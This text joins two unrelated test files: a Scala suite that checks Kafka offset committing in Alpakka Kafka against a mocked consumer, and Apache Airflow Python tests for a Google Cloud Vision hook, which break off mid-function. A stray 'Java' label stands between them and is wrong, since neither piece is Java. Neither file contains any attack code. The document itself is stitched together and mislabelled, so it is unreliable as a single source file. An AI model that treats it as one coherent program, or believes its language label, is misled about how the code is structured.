/* * Copyright (C) 2014 - 2016 Softwaremill <http://softwaremill.com> * Copyright (C) 2016 - 2019 Lightbend Inc. <http://www.lightbend.com> */ package akka.kafka.internal import akka.Done import akka.actor.ActorSystem import akka.kafka.ConsumerMessage._ import akka.kafka.{internal, CommitterSettings, ConsumerSettings, Subscriptions} import akka.kafka.scaladsl.{Committer, Consumer} import akka.kafka.scaladsl.Consumer.Control import akka.kafka.tests.scaladsl.LogCapturing import akka.stream._ import akka.stream.scaladsl._ import akka.stream.testkit.scaladsl.StreamTestKit.assertAllStagesStopped import akka.stream.testkit.scaladsl.TestSink import akka.testkit.TestKit import org.apache.kafka.clients.consumer._ import org.apache.kafka.common.TopicPartition import org.apache.kafka.common.serialization.StringDeserializer import org.scalatest.concurrent.ScalaFutures import org.scalatest.{BeforeAndAfterAll, FlatSpecLike, Matchers} import scala.jdk.CollectionConverters._ import scala.collection.immutable.Seq import scala.concurrent.duration._ import scala.concurrent.{Await, Future} object CommittingWithMockSpec { type K = String type V = String type Record = ConsumerRecord[K, V] def createMessage(seed: Int): CommittableMessage[K, V] = createMessage(seed, "topic") def createMessage(seed: Int, topic: String, groupId: String = "group1", metadata: String = ""): CommittableMessage[K, V] = { val offset = PartitionOffset(GroupTopicPartition(groupId, topic, 1), seed.toLong) val record = new ConsumerRecord(offset.key.topic, offset.key.partition, offset.offset, seed.toString, seed.toString) CommittableMessage(record, CommittableOffsetImpl(offset, metadata)(null)) } def toRecord(msg: CommittableMessage[K, V]): ConsumerRecord[K, V] = msg.record } class CommittingWithMockSpec(_system: ActorSystem) extends TestKit(_system) with FlatSpecLike with Matchers with BeforeAndAfterAll with ScalaFutures with LogCapturing { import CommittingWithMockSpec._ implicit val patience: PatienceConfig = PatienceConfig(15.seconds, 1.second) def this() = this(ActorSystem()) override def afterAll(): Unit = shutdown(system) implicit val m = ActorMaterializer(ActorMaterializerSettings(_system).withFuzzing(true)) implicit val ec = _system.dispatcher val messages = (1 to 1000).map(createMessage) def checkMessagesReceiving(msgss: Seq[Seq[CommittableMessage[K, V]]]): Unit = { val mock = new ConsumerMock[K, V]() val (control, probe) = createCommittableSource(mock.mock) .toMat(TestSink.probe)(Keep.both) .run() probe.request(msgss.map(_.size).sum.toLong) msgss.foreach(chunk => mock.enqueue(chunk.map(toRecord))) probe.expectNextN(msgss.flatten) Await.result(control.shutdown(), remainingOrDefault) } def createCommittableSource(mock: Consumer[K, V], groupId: String = "group1", topics: Set[String] = Set("topic")): Source[CommittableMessage[K, V], Control] = Consumer.committableSource( ConsumerSettings .create(system, new StringDeserializer, new StringDeserializer) .withGroupId(groupId) .withConsumerFactory(_ => mock), Subscriptions.topics(topics) ) def createSourceWithMetadata(mock: Consumer[K, V], metadataFromRecord: ConsumerRecord[K, V] => String, groupId: String = "group1", topics: Set[String] = Set("topic")): Source[CommittableMessage[K, V], Control] = Consumer.commitWithMetadataSource( ConsumerSettings .create(system, new StringDeserializer, new StringDeserializer) .withGroupId(groupId) .withCloseTimeout(ConsumerMock.closeTimeout) .withConsumerFactory(_ => mock), Subscriptions.topics(topics), metadataFromRecord ) it should "commit metadata in message" in assertAllStagesStopped { val commitLog = new ConsumerMock.LogHandler() val mock = new ConsumerMock[K, V](commitLog) val (control, probe) = createSourceWithMetadata(mock.mock, (rec: ConsumerRecord[K, V]) => rec.offset.toString) .toMat(TestSink.probe)(Keep.both) .run() val msg = createMessage(1) mock.enqueue(List(toRecord(msg))) probe.request(100) val done = probe.expectNext().committableOffset.commitInternal() awaitAssert { commitLog.calls should have size (1) } val (topicPartition, offsetMeta) = commitLog.calls.head._1.head topicPartition.topic should ===(msg.record.topic()) topicPartition.partition should ===(msg.record.partition()) // committed offset should be the next message the application will consume, i.e. +1 offsetMeta.offset should ===(msg.record.offset() + 1) offsetMeta.metadata should ===(msg.record.offset.toString) //emulate commit commitLog.calls.head match { case (offsets, callback) => callback.onComplete(offsets.asJava, null) } Await.result(done, remainingOrDefault) Await.result(control.shutdown(), remainingOrDefault) } it should "call commitAsync for commit message and then complete future" in assertAllStagesStopped { val commitLog = new ConsumerMock.LogHandler() val mock = new ConsumerMock[K, V](commitLog) val (control, probe) = createCommittableSource(mock.mock) .toMat(TestSink.probe)(Keep.both) .run() val msg = createMessage(1) mock.enqueue(List(toRecord(msg))) probe.request(100) val done = probe.expectNext().committableOffset.commitInternal() awaitAssert { commitLog.calls should have size (1) } val (topicPartition, offsetMeta) = commitLog.calls.head._1.head topicPartition.topic should ===(msg.record.topic()) topicPartition.partition should ===(msg.record.partition()) // committed offset should be the next message the application will consume, i.e. +1 offsetMeta.offset should ===(msg.record.offset() + 1) //emulate commit commitLog.calls.head match { case (offsets, callback) => callback.onComplete(offsets.asJava, null) } Await.result(done, remainingOrDefault) Await.result(control.shutdown(), remainingOrDefault) } it should "fail future in case of commit fail" in assertAllStagesStopped { val commitLog = new ConsumerMock.LogHandler() val mock = new ConsumerMock[K, V](commitLog) val (control, probe) = createCommittableSource(mock.mock) .toMat(TestSink.probe)(Keep.both) .run() val msg = createMessage(1) mock.enqueue(List(toRecord(msg))) probe.request(100) val done = probe.expectNext().committableOffset.commitInternal() awaitAssert { commitLog.calls should have size (1) } //emulate commit failure val failure = new Exception() commitLog.calls.head match { case (offsets, callback) => callback.onComplete(null, failure) } intercept[Exception] { Await.result(done, remainingOrDefault) } should be(failure) Await.result(control.shutdown(), remainingOrDefault) } it should "collect commits to be sent to commitAsync" in assertAllStagesStopped { val commitLog = new ConsumerMock.LogHandler() val mock = new ConsumerMock[K, V](commitLog) val (control, probe) = createCommittableSource(mock.mock) .toMat(TestSink.probe)(Keep.both) .run() val count = 100 val msgs = (1 to count).map(createMessage) mock.enqueue(msgs.map(toRecord)) probe.request(count.toLong) val allCommits = Future.sequence(probe.expectNextN(count.toLong).map(_.committableOffset.commitInternal())) withClue("the commits are aggregated to a low number of calls to commitAsync:") { awaitAssert { val callsToCommitAsync = commitLog.calls.size callsToCommitAsync should be >= 1 callsToCommitAsync should be < count / 10 } } //emulate commit commitLog.calls.foreach { case (offsets, callback) => callback.onComplete(offsets.asJava, null) } allCommits.futureValue should have size (count.toLong) control.shutdown().futureValue shouldBe Done } it should "support commit batching" in assertAllStagesStopped { val commitLog = new ConsumerMock.LogHandler() val mock = new ConsumerMock[K, V](commitLog) val (control, probe) = createCommittableSource(mock.mock, topics = Set("topic1", "topic2")) .toMat(TestSink.probe)(Keep.both) .run() val msgsTopic1 = (1 to 3).map(createMessage(_, "topic1")) val msgsTopic2 = (11 to 13).map(createMessage(_, "topic2")) mock.enqueue(msgsTopic1.map(toRecord)) mock.enqueue(msgsTopic2.map(toRecord)) probe.request(100) val batch = probe .expectNextN(6) .map(_.committableOffset) .foldLeft(CommittableOffsetBatch.empty)(_.updated(_)) val done = batch.commitInternal() awaitAssert { commitLog.calls should have size (1) } val commitMap = commitLog.calls.head._1 commitMap(new TopicPartition("topic1", 1)).offset should ===(msgsTopic1.last.record.offset() + 1) commitMap(new TopicPartition("topic2", 1)).offset should ===(msgsTopic2.last.record.offset() + 1) //emulate commit commitLog.calls.foreach { case (offsets, callback) => callback.onComplete(offsets.asJava, null) } Await.result(done, remainingOrDefault) Await.result(control.shutdown(), remainingOrDefault) } it should "support commit batching with metadata" in assertAllStagesStopped { val commitLog = new ConsumerMock.LogHandler() val mock = new ConsumerMock[K, V](commitLog) val (control, probe) = createSourceWithMetadata(mock.mock, (rec: ConsumerRecord[K, V]) => rec.offset.toString, topics = Set("topic1", "topic2")) .toMat(TestSink.probe)(Keep.both) .run() val msgsTopic1 = (1 to 3).map(createMessage(_, "topic1")) val msgsTopic2 = (11 to 13).map(createMessage(_, "topic2")) mock.enqueue(msgsTopic1.map(toRecord)) mock.enqueue(msgsTopic2.map(toRecord)) probe.request(100) val batch = probe .expectNextN(6) .map(_.committableOffset) .foldLeft(CommittableOffsetBatch.empty)(_.updated(_)) val done = batch.commitInternal() awaitAssert { commitLog.calls should have size (1) } val commitMap = commitLog.calls.head._1 commitMap(new TopicPartition("topic1", 1)).offset should ===(msgsTopic1.last.record.offset() + 1) commitMap(new TopicPartition("topic2", 1)).offset should ===(msgsTopic2.last.record.offset() + 1) commitMap(new TopicPartition("topic1", 1)).metadata() should ===(msgsTopic1.last.record.offset().toString) commitMap(new TopicPartition("topic2", 1)).metadata() should ===(msgsTopic2.last.record.offset().toString) //emulate commit commitLog.calls.foreach { case (offsets, callback) => callback.onComplete(offsets.asJava, null) } Await.result(done, remainingOrDefault) Await.result(control.shutdown(), remainingOrDefault) } it should "support merging commit batches with metadata" in assertAllStagesStopped { val commitLog = new ConsumerMock.LogHandler() val mock = new ConsumerMock[K, V](commitLog) val (control, probe) = createSourceWithMetadata(mock.mock, (rec: ConsumerRecord[K, V]) => rec.offset.toString, topics = Set("topic1", "topic2")) .toMat(TestSink.probe)(Keep.both) .run() val msgsTopic1 = (1 to 3).map(createMessage(_, "topic1")) val msgsTopic2 = (11 to 13).map(createMessage(_, "topic2")) mock.enqueue(msgsTopic1.map(toRecord)) mock.enqueue(msgsTopic2.map(toRecord)) probe.request(100) val batch = probe .expectNextN(6) .map(_.committableOffset) .grouped(2) .map(_.foldLeft(CommittableOffsetBatch.empty)(_ updated _)) .foldLeft(CommittableOffsetBatch.empty)(_ updated _) val done = batch.commitInternal() awaitAssert { commitLog.calls should have size (1) } val commitMap = commitLog.calls.head._1 commitMap(new TopicPartition("topic1", 1)).offset should ===(msgsTopic1.last.record.offset() + 1) commitMap(new TopicPartition("topic2", 1)).offset should ===(msgsTopic2.last.record.offset() + 1) commitMap(new TopicPartition("topic1", 1)).metadata() should ===(msgsTopic1.last.record.offset().toString) commitMap(new TopicPartition("topic2", 1)).metadata() should ===(msgsTopic2.last.record.offset().toString) //emulate commit commitLog.calls.foreach { case (offsets, callback) => callback.onComplete(offsets.asJava, null) } Await.result(done, remainingOrDefault) Await.result(control.shutdown(), remainingOrDefault) } //FIXME looks like current implementation of batch committer is incorrect it should "support commit batching from more than one stage" in assertAllStagesStopped { val commitLog1 = new ConsumerMock.LogHandler() val commitLog2 = new ConsumerMock.LogHandler() val mock1 = new ConsumerMock[K, V](commitLog1) val mock2 = new ConsumerMock[K, V](commitLog2) val (control1, probe1) = createCommittableSource(mock1.mock, "group1", Set("topic1", "topic2")) .toMat(TestSink.probe)(Keep.both) .run() val (control2, probe2) = createCommittableSource(mock2.mock, "group2", Set("topic1", "topic3")) .toMat(TestSink.probe)(Keep.both) .run() val msgs1a = (1 to 3).map(createMessage(_, "topic1", "group1")) val msgs1b = (11 to 13).map(createMessage(_, "topic2", "group1")) mock1.enqueue(msgs1a.map(toRecord)) mock1.enqueue(msgs1b.map(toRecord)) val msgs2a = (1 to 3).map(createMessage(_, "topic1", "group2")) val msgs2b = (11 to 13).map(createMessage(_, "topic3", "group2")) mock2.enqueue(msgs2a.map(toRecord)) mock2.enqueue(msgs2b.map(toRecord)) probe1.request(100) probe2.request(100) val batch1 = probe1 .expectNextN(6) .map(_.committableOffset) .foldLeft(CommittableOffsetBatch.empty)(_.updated(_)) val batch2 = probe2 .expectNextN(6) .map(_.committableOffset) .foldLeft(batch1)(_.updated(_)) val done2 = batch2.commitInternal() awaitAssert { commitLog1.calls should have size (1) commitLog2.calls should have size (1) } val commitMap1 = commitLog1.calls.head._1 commitMap1(new TopicPartition("topic1", 1)).offset should ===(msgs1a.last.record.offset() + 1) commitMap1(new TopicPartition("topic2", 1)).offset should ===(msgs1b.last.record.offset() + 1) val commitMap2 = commitLog2.calls.head._1 commitMap2(new TopicPartition("topic1", 1)).offset should ===(msgs2a.last.record.offset() + 1) commitMap2(new TopicPartition("topic3", 1)).offset should ===(msgs2b.last.record.offset() + 1) //emulate commit commitLog1.calls.foreach { case (offsets, callback) => callback.onComplete(offsets.asJava, null) } commitLog2.calls.foreach { case (offsets, callback) => callback.onComplete(offsets.asJava, null) } Await.result(done2, remainingOrDefault) Await.result(control1.shutdown(), remainingOrDefault) Await.result(control2.shutdown(), remainingOrDefault) } // Same logic as "support commit batching with metadata" above "Tell committing" should "support commit batching with metadata" in assertAllStagesStopped { val commitLog = new ConsumerMock.LogHandler() val mock = new ConsumerMock[K, V](commitLog) val (control, probe) = createSourceWithMetadata(mock.mock, (rec: ConsumerRecord[K, V]) => rec.offset.toString, topics = Set("topic1", "topic2")) .toMat(TestSink.probe)(Keep.both) .run() val msgsTopic1 = (1 to 3).map(createMessage(_, "topic1")) val msgsTopic2 = (11 to 13).map(createMessage(_, "topic2")) mock.enqueue(msgsTopic1.map(toRecord)) mock.enqueue(msgsTopic2.map(toRecord)) probe.request(100) val batch = probe .expectNextN(6) .map(_.committableOffset) .foldLeft(CommittableOffsetBatch.empty)(_.updated(_)) batch.tellCommit() awaitAssert { commitLog.calls should have size (1) } val commitMap = commitLog.calls.head._1 commitMap(new TopicPartition("topic1", 1)).offset should ===(msgsTopic1.last.record.offset() + 1) commitMap(new TopicPartition("topic2", 1)).offset should ===(msgsTopic2.last.record.offset() + 1) commitMap(new TopicPartition("topic1", 1)).metadata() should ===(msgsTopic1.last.record.offset().toString) commitMap(new TopicPartition("topic2", 1)).metadata() should ===(msgsTopic2.last.record.offset().toString) //emulate commit commitLog.calls.foreach { case (offsets, callback) => callback.onComplete(offsets.asJava, null) } Await.result(control.shutdown(), remainingOrDefault) } "Committer.flow" should "fail in case of an exception during commit" in assertAllStagesStopped { val committerSettings = CommitterSettings(system) .withMaxBatch(1L) val commitLog = new internal.ConsumerMock.LogHandler() val mock = new ConsumerMock[K, V](commitLog) val msg = createMessage(1) mock.enqueue(List(toRecord(msg))) val (control, probe) = createCommittableSource(mock.mock) .map(_.committableOffset) .toMat(Committer.sink(committerSettings))(Keep.both) .run() awaitAssert { commitLog.calls should have size 1 } emulateFailedCommit(commitLog) probe.failed.futureValue shouldBe a[CommitFailedException] control.shutdown().futureValue shouldBe Done } it should "recover with supervision in case of commit fail" in assertAllStagesStopped { val committerSettings = CommitterSettings(system) .withMaxBatch(1L) val commitLog = new ConsumerMock.LogHandler() val mock = new ConsumerMock[K, V](commitLog) val msg = createMessage(1) mock.enqueue(List(toRecord(msg))) val resumeOnCommitFailed: Supervision.Decider = { case _: CommitFailedException => Supervision.Resume case _ => Supervision.Stop } val (control, probe) = createCommittableSource(mock.mock) .map(_.committableOffset) .toMat( Committer .sink(committerSettings) .withAttributes(ActorAttributes.supervisionStrategy(resumeOnCommitFailed)) )(Keep.both) .run() awaitAssert { commitLog.calls should have size 1 } emulateFailedCommit(commitLog) control.shutdown().futureValue shouldBe Done probe.futureValue shouldBe Done } private def emulateFailedCommit(commitLog: ConsumerMock.LogHandler): Unit = { val failure = new CommitFailedException() commitLog.calls.head match { case (_, callback) => callback.onComplete(null, failure) } } }
Java
# # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import unittest from unittest import mock import pytest from google.cloud.vision import enums from google.cloud.vision_v1 import ProductSearchClient from google.cloud.vision_v1.proto.image_annotator_pb2 import ( AnnotateImageResponse, EntityAnnotation, SafeSearchAnnotation, ) from google.cloud.vision_v1.proto.product_search_service_pb2 import Product, ProductSet, ReferenceImage from google.protobuf.json_format import MessageToDict from parameterized import parameterized from airflow.exceptions import AirflowException from airflow.providers.google.cloud.hooks.vision import ERR_DIFF_NAMES, ERR_UNABLE_TO_CREATE, CloudVisionHook from tests.providers.google.cloud.utils.base_gcp_mock import mock_base_gcp_hook_default_project_id PROJECT_ID_TEST = 'project-id' PROJECT_ID_TEST_2 = 'project-id-2' LOC_ID_TEST = 'loc-id' LOC_ID_TEST_2 = 'loc-id-2' PRODUCTSET_ID_TEST = 'ps-id' PRODUCTSET_ID_TEST_2 = 'ps-id-2' PRODUCTSET_NAME_TEST = f'projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/productSets/{PRODUCTSET_ID_TEST}' PRODUCT_ID_TEST = 'p-id' PRODUCT_ID_TEST_2 = 'p-id-2' PRODUCT_NAME_TEST = f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/{PRODUCT_ID_TEST}" PRODUCT_NAME = f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/{PRODUCT_ID_TEST}" REFERENCE_IMAGE_ID_TEST = 'ri-id' REFERENCE_IMAGE_GEN_ID_TEST = 'ri-id' ANNOTATE_IMAGE_REQUEST = { 'image': {'source': {'image_uri': "gs://bucket-name/object-name"}}, 'features': [{'type': enums.Feature.Type.LOGO_DETECTION}], } BATCH_ANNOTATE_IMAGE_REQUEST = [ { 'image': {'source': {'image_uri': "gs://bucket-name/object-name"}}, 'features': [{'type': enums.Feature.Type.LOGO_DETECTION}], }, { 'image': {'source': {'image_uri': "gs://bucket-name/object-name"}}, 'features': [{'type': enums.Feature.Type.LOGO_DETECTION}], }, ] REFERENCE_IMAGE_NAME_TEST = ( f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/" f"{PRODUCTSET_ID_TEST}/referenceImages/{REFERENCE_IMAGE_ID_TEST}" ) REFERENCE_IMAGE_TEST = ReferenceImage(name=REFERENCE_IMAGE_GEN_ID_TEST) REFERENCE_IMAGE_WITHOUT_ID_NAME = ReferenceImage() DETECT_TEST_IMAGE = {"source": {"image_uri": "https://foo.com/image.jpg"}} DETECT_TEST_ADDITIONAL_PROPERTIES = {"test-property-1": "test-value-1", "test-property-2": "test-value-2"} class TestGcpVisionHook(unittest.TestCase): def setUp(self): with mock.patch( 'airflow.providers.google.cloud.hooks.vision.CloudVisionHook.__init__', new=mock_base_gcp_hook_default_project_id, ): self.hook = CloudVisionHook(gcp_conn_id='test') @mock.patch( "airflow.providers.google.cloud.hooks.vision.CloudVisionHook.client_info", new_callable=mock.PropertyMock, ) @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook._get_credentials") @mock.patch("airflow.providers.google.cloud.hooks.vision.ProductSearchClient") def test_product_search_client_creation(self, mock_client, mock_get_creds, mock_client_info): result = self.hook.get_conn() mock_client.assert_called_once_with( credentials=mock_get_creds.return_value, client_info=mock_client_info.return_value ) assert mock_client.return_value == result assert self.hook._client == result @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_create_productset_explicit_id(self, get_conn): # Given create_product_set_method = get_conn.return_value.create_product_set create_product_set_method.return_value = None parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST) product_set = ProductSet() # When result = self.hook.create_product_set( location=LOC_ID_TEST, product_set_id=PRODUCTSET_ID_TEST, product_set=product_set, project_id=PROJECT_ID_TEST, retry=None, timeout=None, metadata=None, ) # Then # ProductSet ID was provided explicitly in the method call above, should be returned from the method assert result == PRODUCTSET_ID_TEST create_product_set_method.assert_called_once_with( parent=parent, product_set=product_set, product_set_id=PRODUCTSET_ID_TEST, retry=None, timeout=None, metadata=None, ) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_create_productset_autogenerated_id(self, get_conn): # Given autogenerated_id = 'autogen-id' response_product_set = ProductSet( name=ProductSearchClient.product_set_path(PROJECT_ID_TEST, LOC_ID_TEST, autogenerated_id) ) create_product_set_method = get_conn.return_value.create_product_set create_product_set_method.return_value = response_product_set parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST) product_set = ProductSet() # When result = self.hook.create_product_set( location=LOC_ID_TEST, product_set_id=None, product_set=product_set, project_id=PROJECT_ID_TEST ) # Then # ProductSet ID was not provided in the method call above. Should be extracted from the API response # and returned. assert result == autogenerated_id create_product_set_method.assert_called_once_with( parent=parent, product_set=product_set, product_set_id=None, retry=None, timeout=None, metadata=None, ) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_create_productset_autogenerated_id_wrong_api_response(self, get_conn): # Given response_product_set = None create_product_set_method = get_conn.return_value.create_product_set create_product_set_method.return_value = response_product_set parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST) product_set = ProductSet() # When with pytest.raises(AirflowException) as ctx: self.hook.create_product_set( location=LOC_ID_TEST, product_set_id=None, product_set=product_set, project_id=PROJECT_ID_TEST, retry=None, timeout=None, metadata=None, ) # Then # API response was wrong (None) and thus ProductSet ID extraction should fail. err = ctx.value assert 'Unable to get name from response...' in str(err) create_product_set_method.assert_called_once_with( parent=parent, product_set=product_set, product_set_id=None, retry=None, timeout=None, metadata=None, ) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_get_productset(self, get_conn): # Given name = ProductSearchClient.product_set_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST) response_product_set = ProductSet(name=name) get_product_set_method = get_conn.return_value.get_product_set get_product_set_method.return_value = response_product_set # When response = self.hook.get_product_set( location=LOC_ID_TEST, product_set_id=PRODUCTSET_ID_TEST, project_id=PROJECT_ID_TEST ) # Then assert response assert response == MessageToDict(response_product_set) get_product_set_method.assert_called_once_with(name=name, retry=None, timeout=None, metadata=None) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_update_productset_no_explicit_name(self, get_conn): # Given product_set = ProductSet() update_product_set_method = get_conn.return_value.update_product_set update_product_set_method.return_value = product_set productset_name = ProductSearchClient.product_set_path( PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST ) # When result = self.hook.update_product_set( location=LOC_ID_TEST, product_set_id=PRODUCTSET_ID_TEST, product_set=product_set, update_mask=None, project_id=PROJECT_ID_TEST, retry=None, timeout=None, metadata=None, ) # Then assert result == MessageToDict(product_set) update_product_set_method.assert_called_once_with( product_set=ProductSet(name=productset_name), metadata=None, retry=None, timeout=None, update_mask=None, ) @parameterized.expand([(None, None), (None, PRODUCTSET_ID_TEST), (LOC_ID_TEST, None)]) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_update_productset_no_explicit_name_and_missing_params_for_constructed_name( self, location, product_set_id, get_conn ): # Given update_product_set_method = get_conn.return_value.update_product_set update_product_set_method.return_value = None product_set = ProductSet() # When with pytest.raises(AirflowException) as ctx: self.hook.update_product_set( location=location, product_set_id=product_set_id, product_set=product_set, update_mask=None, project_id=PROJECT_ID_TEST, retry=None, timeout=None, metadata=None, ) err = ctx.value assert err assert ERR_UNABLE_TO_CREATE.format(label='ProductSet', id_label='productset_id') in str(err) update_product_set_method.assert_not_called() @parameterized.expand([(None, None), (None, PRODUCTSET_ID_TEST), (LOC_ID_TEST, None)]) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_update_productset_explicit_name_missing_params_for_constructed_name( self, location, product_set_id, get_conn ): # Given explicit_ps_name = ProductSearchClient.product_set_path( PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCTSET_ID_TEST_2 ) product_set = ProductSet(name=explicit_ps_name) update_product_set_method = get_conn.return_value.update_product_set update_product_set_method.return_value = product_set # When result = self.hook.update_product_set( location=location, product_set_id=product_set_id, product_set=product_set, update_mask=None, project_id=PROJECT_ID_TEST, retry=None, timeout=None, metadata=None, ) # Then assert result == MessageToDict(product_set) update_product_set_method.assert_called_once_with( product_set=ProductSet(name=explicit_ps_name), metadata=None, retry=None, timeout=None, update_mask=None, ) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_update_productset_explicit_name_different_from_constructed(self, get_conn): # Given update_product_set_method = get_conn.return_value.update_product_set update_product_set_method.return_value = None explicit_ps_name = ProductSearchClient.product_set_path( PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCTSET_ID_TEST_2 ) product_set = ProductSet(name=explicit_ps_name) template_ps_name = ProductSearchClient.product_set_path( PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST ) # When # Location and product_set_id are passed in addition to a ProductSet with an explicit name, # but both names differ (constructed != explicit). # Should throw AirflowException in this case. with pytest.raises(AirflowException) as ctx: self.hook.update_product_set( location=LOC_ID_TEST, product_set_id=PRODUCTSET_ID_TEST, product_set=product_set, update_mask=None, project_id=PROJECT_ID_TEST, retry=None, timeout=None, metadata=None, ) err = ctx.value # self.assertIn("The required parameter 'project_id' is missing", str(err)) assert err assert ( ERR_DIFF_NAMES.format( explicit_name=explicit_ps_name, constructed_name=template_ps_name, label="ProductSet", id_label="productset_id", ) in str(err) ) update_product_set_method.assert_not_called() @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_delete_productset(self, get_conn): # Given delete_product_set_method = get_conn.return_value.delete_product_set delete_product_set_method.return_value = None name = ProductSearchClient.product_set_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST) # When response = self.hook.delete_product_set( location=LOC_ID_TEST, product_set_id=PRODUCTSET_ID_TEST, project_id=PROJECT_ID_TEST ) # Then assert response is None delete_product_set_method.assert_called_once_with(name=name, retry=None, timeout=None, metadata=None) @mock.patch( 'airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn', **{'return_value.create_reference_image.return_value': REFERENCE_IMAGE_TEST}, ) def test_create_reference_image_explicit_id(self, get_conn): # Given create_reference_image_method = get_conn.return_value.create_reference_image # When result = self.hook.create_reference_image( project_id=PROJECT_ID_TEST, location=LOC_ID_TEST, product_id=PRODUCT_ID_TEST, reference_image=REFERENCE_IMAGE_WITHOUT_ID_NAME, reference_image_id=REFERENCE_IMAGE_ID_TEST, ) # Then # Product ID was provided explicitly in the method call above, should be returned from the method assert result == REFERENCE_IMAGE_ID_TEST create_reference_image_method.assert_called_once_with( parent=PRODUCT_NAME, reference_image=REFERENCE_IMAGE_WITHOUT_ID_NAME, reference_image_id=REFERENCE_IMAGE_ID_TEST, retry=None, timeout=None, metadata=None, ) @mock.patch( 'airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn', **{'return_value.create_reference_image.return_value': REFERENCE_IMAGE_TEST}, ) def test_create_reference_image_autogenerated_id(self, get_conn): # Given create_reference_image_method = get_conn.return_value.create_reference_image # When result = self.hook.create_reference_image( project_id=PROJECT_ID_TEST, location=LOC_ID_TEST, product_id=PRODUCT_ID_TEST, reference_image=REFERENCE_IMAGE_TEST, reference_image_id=REFERENCE_IMAGE_ID_TEST, ) # Then # Product ID was provided explicitly in the method call above, should be returned from the method assert result == REFERENCE_IMAGE_GEN_ID_TEST create_reference_image_method.assert_called_once_with( parent=PRODUCT_NAME, reference_image=REFERENCE_IMAGE_TEST, reference_image_id=REFERENCE_IMAGE_ID_TEST, retry=None, timeout=None, metadata=None, ) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_add_product_to_product_set(self, get_conn): # Given add_product_to_product_set_method = get_conn.return_value.add_product_to_product_set # When self.hook.add_product_to_product_set( product_set_id=PRODUCTSET_ID_TEST, product_id=PRODUCT_ID_TEST, location=LOC_ID_TEST, project_id=PROJECT_ID_TEST, ) # Then # Product ID was provided explicitly in the method call above, should be returned from the method add_product_to_product_set_method.assert_called_once_with( name=PRODUCTSET_NAME_TEST, product=PRODUCT_NAME_TEST, retry=None, timeout=None, metadata=None ) # remove_product_from_product_set @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_remove_product_from_product_set(self, get_conn): # Given remove_product_from_product_set_method = get_conn.return_value.remove_product_from_product_set # When self.hook.remove_product_from_product_set( product_set_id=PRODUCTSET_ID_TEST, product_id=PRODUCT_ID_TEST, location=LOC_ID_TEST, project_id=PROJECT_ID_TEST, ) # Then # Product ID was provided explicitly in the method call above, should be returned from the method remove_product_from_product_set_method.assert_called_once_with( name=PRODUCTSET_NAME_TEST, product=PRODUCT_NAME_TEST, retry=None, timeout=None, metadata=None ) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client') def test_annotate_image(self, annotator_client_mock): # Given annotate_image_method = annotator_client_mock.annotate_image # When self.hook.annotate_image(request=ANNOTATE_IMAGE_REQUEST) # Then # Product ID was provided explicitly in the method call above, should be returned from the method annotate_image_method.assert_called_once_with( request=ANNOTATE_IMAGE_REQUEST, retry=None, timeout=None ) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client') def test_batch_annotate_images(self, annotator_client_mock): # Given batch_annotate_images_method = annotator_client_mock.batch_annotate_images # When self.hook.batch_annotate_images(requests=BATCH_ANNOTATE_IMAGE_REQUEST) # Then # Product ID was provided explicitly in the method call above, should be returned from the method batch_annotate_images_method.assert_called_once_with( requests=BATCH_ANNOTATE_IMAGE_REQUEST, retry=None, timeout=None ) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_create_product_explicit_id(self, get_conn): # Given create_product_method = get_conn.return_value.create_product create_product_method.return_value = None parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST) product = Product() # When result = self.hook.create_product( location=LOC_ID_TEST, product_id=PRODUCT_ID_TEST, product=product, project_id=PROJECT_ID_TEST ) # Then # Product ID was provided explicitly in the method call above, should be returned from the method assert result == PRODUCT_ID_TEST create_product_method.assert_called_once_with( parent=parent, product=product, product_id=PRODUCT_ID_TEST, retry=None, timeout=None, metadata=None, ) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_create_product_autogenerated_id(self, 